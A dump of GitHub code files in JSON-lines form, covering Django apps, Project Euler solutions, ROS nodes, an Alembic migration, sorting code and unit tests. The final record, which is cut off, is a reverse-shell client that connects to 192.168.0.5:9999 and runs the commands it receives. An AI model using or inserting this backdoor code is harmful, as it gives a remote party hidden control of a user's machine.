django.contrib import admin\nfrom django.conf import settings\nfrom django.contrib.sitemaps.views import sitemap\nfrom .sitemaps import SitemapCategory, SitemapContacts, SitemapAboutUs\n\nadmin.autodiscover()\n\nsitemaps = {'category': SitemapCategory,\n 'about': SitemapAboutUs,\n 'contacts': SitemapContacts,\n }\n\nurlpatterns = [\n url(r'^ckeditor/', include('ckeditor_uploader.urls')),\n url(r'^admin/', admin.site.urls, name='admin'),\n url(r'^info/', include('inform.urls')),\n url(r'^auth/', include('loginsys.urls')),\n url(r'^', include('catalog.urls')),\n\n url(r'^sitemap\\.xml$', sitemap, {'sitemaps': sitemaps},\n name='django.contrib.sitemaps.views.sitemap'),\n ]\n\nurlpatterns += patterns('',\n (r'^media/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT}))","repo_name":"NikolayPogoreliy/PhotoPage","sub_path":"PhotoPage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24483948730","text":"#find the 10 001 prime\r\n\r\nprint(\"Starting...\")\r\n\r\nprimes = [2]\r\n\r\ncurrentlength = 1\r\n\r\ncounter = 3\r\n\r\nisCounterPrime = True\r\n\r\nwhile currentlength < 10001:\r\n for int in range(currentlength):\r\n if counter%primes[int] == 0:\r\n isCounterPrime = False\r\n break\r\n if isCounterPrime:\r\n primes.append(counter)\r\n currentlength+=1\r\n counter+=2\r\n isCounterPrime = True\r\n if currentlength%1000 == 0:\r\n print(currentlength)\r\n \r\n\r\nprint(primes[-1])\r\n","repo_name":"alexandrepoulin/ProjectEulerInPython","sub_path":"problems/problem 6.py","file_name":"problem 6.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25342752749","text":"import os\nimport hashlib\nimport tempfile\nimport pickle\nfrom common_constants import constants\nfrom datetime import date\nENVI = constants.EnviVar(\n main_dir=\"/home/eugene/Yandex.Disk/localsource/google_analytics/\",\n cred_dir=\"/home/eugene/Yandex.Disk/localsource/credentials/\"\n)\nlogger = constants.logging.getLogger(__name__)\n\n\nclass MemoryDiscoveryCache:\n \"\"\"\n https://github.com/googleapis/google-api-python-client/tree/master/googleapiclient/discovery_cache\n https://github.com/googleapis/google-api-python-client/issues/325\n Based on Schweigi's solution on 22 Jan 2017\n \"\"\"\n _CACHE = {}\n\n @staticmethod\n def get(url):\n return MemoryDiscoveryCache._CACHE.get(url)\n\n @staticmethod\n def set(url, content):\n MemoryDiscoveryCache._CACHE[url] = content\n\n\nclass TmpFileDiscoveryCache:\n \"\"\"\n https://github.com/googleapis/google-api-python-client/tree/master/googleapiclient/discovery_cache\n https://github.com/googleapis/google-api-python-client/issues/325\n Based on Schweigi's and Chronial solutions on 7 Sep 2018\n \"\"\"\n @staticmethod\n def filename(url):\n return os.path.join(\n tempfile.gettempdir(),\n 'google_api_discovery_' + hashlib.md5(url.encode()).hexdigest())\n\n def get(self, url):\n try:\n with open(self.filename(url), 'rb') as f:\n return f.read().decode()\n except FileNotFoundError:\n return None\n\n def set(self, url, content):\n with tempfile.NamedTemporaryFile(delete=False) as f:\n f.write(content.encode())\n f.flush()\n os.fsync(f)\n os.rename(f.name, self.filename(url))\n\n\nclass DumpFileDiscoveryCache:\n \"\"\"\n https://github.com/googleapis/google-api-python-client/tree/master/googleapiclient/discovery_cache\n https://github.com/googleapis/google-api-python-client/issues/325\n Based on Schweigi's and Chronial solutions on 7 Sep 2018\n \"\"\"\n @staticmethod\n def filename(url):\n return f'{ENVI[\"MAIN_PYSEA_DIR\"]}alldata/cache/' \\\n f'google_api_discovery_{date.today()}_{hashlib.md5(url.encode()).hexdigest()}.pickle'\n\n def get(self, url):\n try:\n with open(self.filename(url), 'rb') as f:\n return pickle.load(f)\n except FileNotFoundError:\n return None\n\n def set(self, url, content):\n logger.debug(f\"DumpFileDiscoveryCache SET: {content}\")\n with open(self.filename(url), \"wb\") as f:\n pickle.dump(content, f, pickle.HIGHEST_PROTOCOL)\n","repo_name":"ekomissarov/google_analytics","sub_path":"google_analytics/analyticscache.py","file_name":"analyticscache.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13395529408","text":"\"\"\"songs table\n\nRevision ID: 946fc5eb5c3f\nRevises: 7c4d33b2f0d6\nCreate Date: 2021-12-15 17:30:52.818293\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '946fc5eb5c3f'\ndown_revision = '7c4d33b2f0d6'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('song',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('track_name', sa.String(length=128), nullable=True),\n sa.Column('artist_name', sa.String(length=64), nullable=True),\n sa.Column('genre', sa.String(length=64), nullable=True),\n sa.Column('beats_per_minute', sa.Integer(), nullable=True),\n sa.Column('popularity', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('popularity'),\n sa.UniqueConstraint('track_name')\n )\n op.drop_table('followers')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('followers',\n sa.Column('follower_id', sa.INTEGER(), nullable=True),\n sa.Column('followed_id', sa.INTEGER(), nullable=True),\n sa.ForeignKeyConstraint(['followed_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['follower_id'], ['user.id'], )\n )\n op.drop_table('song')\n # ### end Alembic commands ###\n","repo_name":"ohimjosh/iMusic-Leaderboards","sub_path":"migrations/versions/946fc5eb5c3f_songs_table.py","file_name":"946fc5eb5c3f_songs_table.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38633628575","text":"#Merge sort algroithm\n\nimport time\n\ndef merge_sort(merge_list):\n #Divide the list into two seperate lists\n if len(merge_list) > 1:\n mid = len(merge_list) // 2\n left_half = merge_list[mid:]\n right_half = merge_list[:mid]\n\n merge_sort(left_half)\n merge_sort(right_half)\n i = 0\n j = 0\n k = 0\n #Main sorting loop\n while i < len(left_half) and j < len(right_half):\n if left_half[i] < right_half[j]:\n merge_list[k] = left_half[i]\n i += 1\n else:\n merge_list[k] = right_half[j]\n j += 1\n #End if\n k += 1\n #End while\n\n #Check for unmerged elements on left half\n while i < len(left_half):\n merge_list[k] = left_half[i]\n i += 1\n k += 1\n #End while\n\n #Check for unmerged elements on right half\n while j < len(right_half):\n merge_list[k] = right_half[j]\n j += 1\n k += 1\n #End while\n #End if\n#End function\n\nmerge_list = [6,5,2,77,55,334,53,553,53,64,76,24,86,43,55,1,335,545,6,7,38]\nstart = time.perf_counter()\nmerge_sort(merge_list)\nend = time.perf_counter()\nelapsed = end - start\nprint(\"Sorted list: \", merge_list, \" Time taken: \", elapsed)\n","repo_name":"RowleySanchezm/Yr12ComputerScience","sub_path":"Sorting algorithms/Merge sort.py","file_name":"Merge sort.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20689391682","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nimport pkgutil\nimport rospy\nfrom sensor_msgs.msg import JointState\nfrom geometry_msgs.msg import Point, Point32\nfrom std_msgs.msg import String\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom std_msgs.msg import Header\nimport math\nimport time\nfrom PyKDL import Frame, Vector, Rotation\nimport PyKDL\nimport tf\nimport superros.transformations as transformations\nfrom superros.logger import Logger\nfrom rocup.storage.tf_storage import TfStorage\nfrom superros.comm import RosNode\nfrom rocup.proxy.proxy_message import SimpleMessage, SimpleMessageProxy\n\nimport message_filters\nimport rospkg\nimport numpy as np\nimport math\nimport sys\nimport random\n\n#⬢⬢⬢⬢⬢➤ NODE\nnode = RosNode(\"tf_manager\")\n\nnode.setupParameter(\"hz\", 30)\nnode.setupParameter(\"world_tf\", \"world\")\nnode.setupParameter(\"target_tf\", \"target\")\nnode.setupParameter(\"storage_prefix\", \"saved_\")\nnode.setupParameter(\"max_save_iterations\", 30)\nnode.setHz(node.getParameter(\"hz\"))\n\n#⬢⬢⬢⬢⬢➤ variables\nmessage_proxy = SimpleMessageProxy()\ntf_storage = TfStorage()\nall_tfs = []\npublishing = True\n\n\ndef command_cb(message):\n global current_tf_name, publishing, all_tfs\n if message.isValid():\n receiver = message.getReceiver()\n command = message.getCommand()\n if receiver == node.getName():\n print(\"New command received\", message.toString())\n #⬢⬢⬢⬢⬢➤ UPDATE\n if command == 'update':\n all_tfs = tf_storage.allTfs()\n return\n #⬢⬢⬢⬢⬢➤ START PUBLISH\n if command == 'start_publish':\n publishing = True\n return\n #⬢⬢⬢⬢⬢➤ STOP PUBLISH\n if command == 'stop_publish':\n publishing = False\n return\n #⬢⬢⬢⬢⬢➤ DELETE_ALL\n if command == 'delete_all':\n tf_storage.deleteAll()\n all_tfs = []\n return\n #⬢⬢⬢⬢⬢➤ DELETE\n if command == 'delete':\n saving_name = message.getData(\"saving_name\")\n tf_storage.removeFrameByName(saving_name)\n all_tfs = tf_storage.allTfs()\n return\n #⬢⬢⬢⬢⬢➤ SAVE\n if command == 'save':\n saving_name = message.getData(\"saving_name\")\n tf_name = message.getData(\"tf_name\")\n tf_parent = message.getData(\"tf_parent\")\n iterations = node.getParameter(\"max_save_iterations\")\n if tf_name == None:\n Logger.error(\"'tf_name' must be not None\")\n return\n if tf_parent == None:\n Logger.error(\"'tf_parent' must be not None\")\n return\n if saving_name == None:\n Logger.error(\"'saving_name' must be not None\")\n return\n while iterations > 0:\n frame = node.retrieveTransform(\n tf_name,\n tf_parent,\n -1\n )\n if frame:\n tf_storage.saveFrame(\n frame,\n saving_name,\n tf_parent\n )\n print(\"Saving \", tf_name, tf_parent)\n return\n Logger.error(\n \"Max iterations reached, retrieving '{}'\".format(tf_name))\n\n\nmessage_proxy.register(command_cb)\n\nwhile node.isActive():\n if publishing:\n for tf in all_tfs:\n tf_parent = tf[1][\"parent_tf\"]\n tf_name = tf[1][\"name\"]\n tf_data = tf[0]\n # print(\"Publish\", tf_parent, tf_name, tf_data)\n node.broadcastTransform(\n tf_data,\n tf_name,\n tf_parent,\n node.getCurrentTime()\n )\n node.tick()\n","repo_name":"zanellar/rocup","sub_path":"scripts/nodes/production/tfs/tf_manager.py","file_name":"tf_manager.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15159338109","text":"N = int(input())\r\na = []\r\nfor i in range(N):\r\n temp = input().split(\" \")\r\n temp = [int(i) for i in temp]\r\n total = 0\r\n #print(temp)\r\n for j in range(4):\r\n total += temp[j]\r\n #print(total)\r\n total += temp[4]*110/900\r\n a.append(total)\r\n#print(a)\r\nprint(max(a))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc034/A/4263051.py","file_name":"4263051.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"7411320348","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils.html import format_html\nfrom django.conf import settings\nfrom crum import get_current_user\nfrom datetime import datetime\nfrom datetime import date\nfrom django.core.validators import MaxValueValidator\nfrom django.contrib.sessions.models import Session\n# from datetime import datetime\n\n\n# Create your models here.\nUser = settings.AUTH_USER_MODEL\n\n# Model to store the list of logged in users\n\nclass UserSession(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n session = models.OneToOneField(Session, on_delete=models.CASCADE)\n\nclass Profile(models.Model):\n user = models.OneToOneField(User,blank=True, null=True, on_delete = models.CASCADE)\n name = models.CharField(max_length=200,null=True)\n is_director = models.BooleanField(default=False)\n is_standard = models.BooleanField(default=False)\n is_management = models.BooleanField(default=False)\n is_principal = models.BooleanField(default=False)\n is_new = models.BooleanField(default=False)\n def __str__(self):\n return self.name\n\nclass Pv(models.Model):\n accounts =(\n ('Sub CF','Sub CF'),\n ('Special','Special'),\n ('Directors','Directors'),\n ('Operations','Operations'),\n ('LSGDP','LSGDP'),\n ('DWAP','DWAP'),\n ('Capacity(USD)','Capacity(USD)')\n )\n acc =(\n ('Yes','Yes'),\n ('No', 'No')\n )\n\n source =(\n ('GOG','GOG'),\n ('Others', 'Others')\n )\n pv =(\n ('General','General'),\n ('Honorarium','Honorarium')\n )\n center=(\n ('Cost Center 1','Cost Center 1'),\n ('Cost Center 2','Cost Center 2'),\n ('Cost Center 3','Cost Center 3'),\n ('Cost Center 4','Cost Center 4'),\n ('Cost Center 5','Cost Center 5')\n )\n stat =(\n ('Completed','Completed'),\n ('Returned','Returned'),\n ('Cancelled','Cancelled')\n )\n IA_System_Code = models.AutoField(primary_key = True)\n IA_code = models.CharField(max_length = 150)\n Date_recieved = models.DateField(validators=[MaxValueValidator(limit_value=date.today)])\n Pv_reference = models.CharField(unique = True, max_length = 120)\n Source_of_Funding = models.CharField(max_length=50, choices = source)\n Cost_center = models.CharField(max_length=50, choices = center)\n Payee = models.CharField(max_length=500,blank=True, null=True)\n Description = models.CharField(max_length = 500)\n Account_code = models.CharField(max_length=350)\n Gross_amount = models.DecimalField(max_digits=19, decimal_places=2)\n Withholding_tax = models.DecimalField(max_digits=19, decimal_places=2)\n Net_amount = models.DecimalField(max_digits=19, decimal_places=2)\n Status = models.CharField(max_length = 60, choices = stat )\n Remarks =models.CharField(max_length = 500, blank = True)\n Acc_Impress = models.CharField(max_length = 350,choices=acc)\n Date_returned =models.DateField(null=True,blank = True)\n Type_of_accounts= models.CharField(max_length = 100, choices = accounts)\n Type_of_pv = models.CharField(max_length = 20, choices = pv)\n returned_to_chest = models.DecimalField(max_digits=19, decimal_places=2,default= 0.00)\n createds = models.DateTimeField(default= datetime.now,null=True)\n created_by = models.ForeignKey('auth.User', blank=True, null=True, default=None,on_delete=models.CASCADE,related_name='create')\n modifieds = models.DateTimeField(null=True,validators=[MaxValueValidator(limit_value=date.today)])\n modified_by = models.ForeignKey('auth.User', blank=True, null=True,default=None ,on_delete=models.CASCADE,related_name='modified')\n worker = models.ForeignKey(Profile,null=True, on_delete=models.SET_NULL)\n class Meta():\n ordering = [\"-IA_System_Code\"]\n\n def save(self, *args, **kwargs):\n user = get_current_user()\n if user and not user.pk:\n user = None\n if not self.pk:\n self.created_by = user\n\n self.created = datetime.now()\n else:\n self.modified_by = user\n self.modified = datetime.now()\n super(Pv, self).save(*args, **kwargs)\n\n\n def __str__(self):\n return self.Pv_reference + \"--- \" + self.Description + \"--- \" + self.Type_of_pv\n\n\nclass Grade(models.Model):\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return self.name\n\n\nclass Staff(models.Model):\n name = models.CharField(max_length = 300)\n rank = models.ForeignKey(Grade, on_delete=models.CASCADE, blank=True)\n amount = models.DecimalField(max_digits=19, decimal_places=2)\n Pv_reference = models.ForeignKey('Pv',on_delete=models.CASCADE, related_name='Pvreference')\n Date_added = models.DateTimeField(default= datetime.now)\n\n def __str__(self):\n return self.name\n\n\n\n\n\n\n # class Grade(models.Model):\n","repo_name":"ITtechnical/pv","sub_path":"auditservice/pv/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39457384499","text":"import os\nimport json\n\n\nroot1 = \"evaluation\"\nroot2 = \"training\"\n\ndata = {}\ndata[\"evaluation\"] = []\ndata[\"training\"] = []\n\nfor filename in os.listdir(root1):\n data[\"evaluation\"].append(filename)\nfor filename in os.listdir(root2):\n data[\"training\"].append(filename)\n\nf = open(\"file_list.json\", \"w\")\njson.dump(data, f, indent=4, sort_keys=True)\n","repo_name":"ZhuFengdaaa/ARC-C","sub_path":"data/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36058903237","text":"from plone.app.contentmenu.menu import DisplaySubMenuItem, FactoriesSubMenuItem\nfrom genweb.core import GenwebMessageFactory as _\nfrom plone.app.dexterity.behaviors.constrains import ConstrainTypesBehavior\nfrom Products.CMFPlone.interfaces.constrains import ISelectableConstrainTypes\n\n# constants for enableConstrain. Copied from AT\nACQUIRE = -1 # acquire locallyAllowedTypes from parent (default)\nDISABLED = 0 # use default behavior of PortalFolder which uses the FTI info\nENABLED = 1 # allow types from locallyAllowedTypes only\n\n\nclass gwDisplaySubMenuItem(DisplaySubMenuItem):\n\n title = _(u'label_choose_template', default=u'Display')\n\n\nclass gwFactoriesSubMenuItem(FactoriesSubMenuItem):\n\n title = _(u'label_add_new_item', default=u'Add new\\u2026')\n\n\nclass gwConstrainTypesBehavior(ConstrainTypesBehavior):\n\n def _filterByDefaults(self, types, context=None):\n \"\"\"\n Filter the given types by the items which would also be allowed by\n default. Important, else users could circumvent security restritions\n \"\"\"\n if context is None:\n context = self.context\n defaults = [\n fti.getId() for fti in self.getDefaultAddableTypes(context)\n ]\n return [x for x in types if x in defaults]\n\n def allowedContentTypes(self, context=None):\n \"\"\"\n If constraints are enabled, return the locally allowed types.\n If the setting is ACQUIRE, acquire the locally allowed types according\n to the ACQUIRE rules, described in the interface.\n If constraints are disabled, use the default addable types\n\n This method returns the FTI, NOT the FTI id, like most other methods.\n \"\"\"\n if context is None:\n context = self.context\n mode = self.getConstrainTypesMode()\n default_addable = self.getDefaultAddableTypes(context)\n\n if mode == DISABLED:\n return default_addable\n elif mode == ENABLED:\n if hasattr(self.context, 'locally_allowed_types'):\n return [t for t in default_addable if t.getId() in\n self.context.locally_allowed_types]\n else:\n return default_addable\n elif mode == ACQUIRE:\n parent = self.context.__parent__\n parent_constrain_adapter = ISelectableConstrainTypes(parent, None)\n if not parent_constrain_adapter:\n return default_addable\n return_tids = self._filterByDefaults(\n parent_constrain_adapter.getLocallyAllowedTypes(\n context), context)\n return [t for t in default_addable if t.getId() in return_tids]\n else:\n raise Exception(\n \"Wrong constraint setting. %i is an invalid value\",\n mode)\n\n def getImmediatelyAddableTypes(self, context=None):\n \"\"\"\n If constraints are enabled, return the locally immediately\n addable tpes.\n If the setting is ACQUIRE, acquire the immediately addable types from\n the parent, according to the rules described in the interface.\n If constraints are disabled, use the default addable types\n \"\"\"\n if context is None:\n context = self.context\n mode = self.getConstrainTypesMode()\n default_addable = [t.getId() for t in self.getDefaultAddableTypes(context)]\n\n if mode == DISABLED:\n return default_addable\n elif mode == ENABLED:\n if hasattr(self.context, 'immediately_addable_types'):\n return self._filterByDefaults(\n self.context.immediately_addable_types, context)\n elif mode == ACQUIRE:\n parent = self.context.__parent__\n parent_constrain_adapter = ISelectableConstrainTypes(parent, None)\n if not parent_constrain_adapter:\n return default_addable\n return self._filterByDefaults(\n parent_constrain_adapter.getImmediatelyAddableTypes(context), context)\n else:\n raise Exception(\n \"Wrong constraint setting. %i is an invalid value\",\n mode)\n","repo_name":"UPCnet/genweb.core","sub_path":"genweb/core/overrides.py","file_name":"overrides.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33268068409","text":"'''a=[1,2,3,4,5]\ndef listfunc(list):\n\tprint(list[0],list[-1])\n\nprint(listfunc(a))'''\nb=[1,1,2.3,5,8,13,21,34,55,89]\n'''for i in list(b):\n\tif i<5:\n\t\tprint(i)'''\n\ndef listnum():\n\tnewlist=[]\n\tfor i in list(b):\n\t\tif i<5:\n\t\t\tnewlist.append(i)\n\tprint(newlist)\nlistnum()\n\nc=[1,2,3,4,5,6,7,8,9,10,11,12,13]\ndef listnum3():\n\tnewlist1=[]\n\tfor i in list(b):\n\t\tfor n in list(c):\n\t\t\tif i==n:\n\t\t\t\tnewlist1.append(i)\n\tprint(newlist1)\nlistnum3()\ndef prime(n):\n\tif n/n:\n\t\t\tnewlist.append(i)\n\tprint(newlist)\nlistnum()","repo_name":"orr19-meet/YL1-201718","sub_path":"Lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"304647003","text":"import sys\n\n\ndef combination(n, m):\n if n == m or m == 0:\n return 1\n if dp[n][m]:\n return dp[n][m]\n\n dp[n][m] = combination(n - 1, m - 1) + combination(n - 1, m)\n return dp[n][m]\n\n\nN, M = map(int, sys.stdin.readline().split())\ndp = [[0 for _ in range(101)] for _ in range(101)]\nprint(combination(N, M))","repo_name":"maroon1290/PS_JoonYeol","sub_path":"BaekJoon/DynamicProgramming/2407번 조합/조합.py","file_name":"조합.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13947043874","text":"import numpy as np\nimport cv2\nimport keras\nfrom keras.models import load_model\nfrom keras.preprocessing import image\nimport cv_bridge\nimport rclpy \nfrom rclpy.node import Node\nfrom sensor_msgs.msg import Image\n\nkerasModelPath = input('Please enter the filePath for the h5 file (Example: /home/brock/Documents/TurtleBotClassifer.h5): ')\n\nclass getCameraDataNode(Node):\n def __init__(self):\n super().__init__(\"getCamDataNode\")\n self.bridge = cv_bridge.CvBridge()\n self.image_sub = self.create_subscription(Image, \"/camera/image_raw\", self.handle_camera_data, 10)\n self.model = keras.models.load_model(kerasModelPath)\n\n def handle_camera_data(self,msg):\n global perr, ptime, serr, dt\n bot_img = self.bridge.imgmsg_to_cv2(msg,desired_encoding='passthrough')\n bot_img = cv2.resize(bot_img,(640,480))\n img = np.expand_dims(bot_img,axis=0)\n prediction = int(self.model.predict(img))\n if prediction == 0:\n print('TurtleBot Detected')\n if prediction != 0:\n print('No TurtleBot Detected')\n \n\n\n\ndef main(args=None):\n rclpy.init(args=args)\n node = getCameraDataNode()\n rclpy.spin(node)\n rclpy.shutdown()\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"andrewsimonds14/Highway-Simulation","sub_path":"robotDetection/TurtleBotClassifierNode.py","file_name":"TurtleBotClassifierNode.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33221472322","text":"import numpy as np\nfrom keras.callbacks import Callback\nfrom seqeval.metrics import f1_score, classification_report\n\n\nclass F1Metrics(Callback):\n\n def __init__(self, id2label, pad_value=0, validation_data=None):\n \"\"\"\n Args:\n id2label (dict): id to label mapping.\n (e.g. {1: 'B-LOC', 2: 'I-LOC'})\n pad_value (int): padding value.\n \"\"\"\n super(F1Metrics, self).__init__()\n self.id2label = id2label\n self.pad_value = pad_value\n self.validation_data = validation_data\n self.is_fit = validation_data is None\n\n def find_pad_index(self, array):\n \"\"\"Find padding index.\n\n Args:\n array (list): integer list.\n\n Returns:\n idx: padding index.\n\n Examples:\n >>> array = [1, 2, 0]\n >>> self.find_pad_index(array)\n 2\n \"\"\"\n try:\n return list(array).index(self.pad_value)\n except ValueError:\n return len(array)\n\n def get_length(self, y):\n \"\"\"Get true length of y.\n\n Args:\n y (list): padded list.\n\n Returns:\n lens: true length of y.\n\n Examples:\n >>> y = [[1, 0, 0], [1, 1, 0], [1, 1, 1]]\n >>> self.get_length(y)\n [1, 2, 3]\n \"\"\"\n lens = [self.find_pad_index(row) for row in y]\n return lens\n\n def convert_idx_to_name(self, y, lens):\n \"\"\"Convert label index to name.\n\n Args:\n y (list): label index list.\n lens (list): true length of y.\n\n Returns:\n y: label name list.\n\n Examples:\n >>> # assumes that id2label = {1: 'B-LOC', 2: 'I-LOC'}\n >>> y = [[1, 0, 0], [1, 2, 0], [1, 1, 1]]\n >>> lens = [1, 2, 3]\n >>> self.convert_idx_to_name(y, lens)\n [['B-LOC'], ['B-LOC', 'I-LOC'], ['B-LOC', 'B-LOC', 'B-LOC']]\n \"\"\"\n y = [[self.id2label[idx] for idx in row[:l]]\n for row, l in zip(y, lens)]\n return y\n\n def predict(self, X, y):\n \"\"\"Predict sequences.\n\n Args:\n X (list): input data.\n y (list): tags.\n\n Returns:\n y_true: true sequences.\n y_pred: predicted sequences.\n \"\"\"\n y_pred = self.model.predict_on_batch(X)\n\n # reduce dimension.\n y_true = np.argmax(y, -1)\n y_pred = np.argmax(y_pred, -1)\n\n lens = self.get_length(y_true)\n\n y_true = self.convert_idx_to_name(y_true, lens)\n y_pred = self.convert_idx_to_name(y_pred, lens)\n\n return y_true, y_pred\n\n def score(self, y_true, y_pred):\n \"\"\"Calculate f1 score.\n\n Args:\n y_true (list): true sequences.\n y_pred (list): predicted sequences.\n\n Returns:\n score: f1 score.\n \"\"\"\n score = f1_score(y_true, y_pred)\n print(' - f1: {:04.2f}'.format(score * 100))\n print(classification_report(y_true, y_pred, digits=4))\n return score\n\n def on_epoch_end(self, epoch, logs={}):\n if self.is_fit:\n self.on_epoch_end_fit(epoch, logs)\n else:\n self.on_epoch_end_fit_generator(epoch, logs)\n\n def on_epoch_end_fit(self, epoch, logs={}):\n X = self.validation_data[0]\n y = self.validation_data[1]\n y_true, y_pred = self.predict(X, y)\n score = self.score(y_true, y_pred)\n logs['f1'] = score\n\n def on_epoch_end_fit_generator(self, epoch, logs={}):\n y_true = []\n y_pred = []\n for X, y in self.validation_data:\n y_true_batch, y_pred_batch = self.predict(X, y)\n y_true.extend(y_true_batch)\n y_pred.extend(y_pred_batch)\n score = self.score(y_true, y_pred)\n logs['f1'] = score\n","repo_name":"otaku-47/Legal_EE","sub_path":"Demo/venv/Lib/site-packages/seqeval/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31685716257","text":"import logging\nimport time\n\n# import the original example.py\nfrom handler import DigitalBeing as DB\n\nlogger = logging.getLogger('server_logger')\nlogger.setLevel(logging.DEBUG)\n# create file handler which logs even debug messages\nfh = logging.FileHandler('grpc_server.log')\nfh.setLevel(logging.DEBUG)\n\nlogger.addHandler(fh)\n\n# create a class to define the server functions, derived from\n# example_pb2_grpc.AgentServicer\nclass Service():\n\n def __init__(self):\n self.digital_being = DB()\n \nService()\nwhile True:\n time.sleep(86400)\n#except KeyboardInterrupt:\n #server.stop(0)","repo_name":"EtherealEngine/Digital-Beings","sub_path":"server/grpc/pyserver.py","file_name":"pyserver.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"72"} +{"seq_id":"15213748917","text":"'''Main tests in API'''\nimport unittest\nfrom model.source.caged import BaseCaged, CagedSaldo\n\nclass BaseCagedGetOptionsEmpresaTest(unittest.TestCase):\n ''' Class that tests translation of options from general to\n datasource-oriented ones '''\n def test_options_empresa_translation(self):\n ''' Tests if the options are correctly built according to given args '''\n self.assertEqual(\n BaseCaged().get_options_empresa(\n {'column': 2099, 'cnpj_raiz': '12345678'},\n {'compet': 'col_compet', 'cnpj_raiz': 'col_cnpj_raiz'},\n 'cagedtrabalhador',\n None\n ),\n {\n 'categorias': ['col_cnpj_raiz'],\n 'agregacao': ['count'],\n 'where': [\n \"eq-cast(col_cnpj_raiz as INT)-12345678\",\n \"and\", \"eq-cast(col_compet as INT)-2099\",\n \"and\", \"eq-tipo_estab-1\"\n ],\n 'theme': 'cagedtrabalhador'\n }\n )\n\n def test_rules_empresa_translation(self):\n ''' Tests if the options are correctly built according to given args '''\n self.assertEqual(\n BaseCaged().get_options_rules_empresa(\n {'column': 2099, 'cnpj_raiz': '12345678'},\n {'compet': 'col_compet', 'cnpj_raiz': 'col_cnpj_raiz'},\n 'caged',\n None\n ),\n [\"and\", \"eq-tipo_estab-1\"]\n )\n\nclass CagedSaldoGetOptionsEmpresaTest(unittest.TestCase):\n ''' Class that tests translation of options from general to\n datasource-oriented ones '''\n def test_options_empresa_translation(self):\n ''' Tests if the options are correctly built according to given args '''\n self.assertEqual(\n CagedSaldo().get_options_empresa(\n {'cnpj_raiz': '12345678'},\n {'cnpj': 'col_cnpj'},\n 'cagedsaldo',\n None\n ),\n {\n 'categorias': ['\\'1\\'-pos'],\n \"valor\": ['qtd_admissoes', 'qtd_desligamentos', 'saldo_mov'],\n 'agregacao': ['sum'],\n 'where': [\n \"eqlpint-col_cnpj-12345678-14-0-1-8\",\n \"and\", \"eq-tipo_estab-1\"\n ],\n 'theme': 'cagedsaldo'\n }\n )\n","repo_name":"smartlab-br/datahub-api","sub_path":"app/test/test_model/source/test_caged.py","file_name":"test_caged.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26908252134","text":"import os\nimport socket\nimport subprocess\n\n\n# Create a socket\ndef socket_create():\n try:\n global host\n global port\n global s\n host = '192.168.0.5'\n port = 9999\n s = socket.socket()\n except socket.error as msg:\n print(\"Socket creation error: \" + str(msg))\n\n\n# Connect to a remote socket\ndef socket_connect():\n try:\n global host\n global port\n global s\n s.connect((host, port))\n except socket.error as msg:\n print(\"Socket connection error: \" + str(msg))\n\n\n# Receive commands from remote server and run on local machine\ndef receive_commands():\n global s\n while True:\n data = s.recv(1024)\n if data[:2].decode(\"utf-8\") == 'cd':\n os.chdir(data[3:].decode(\"utf-8\"))\n if len(data) > 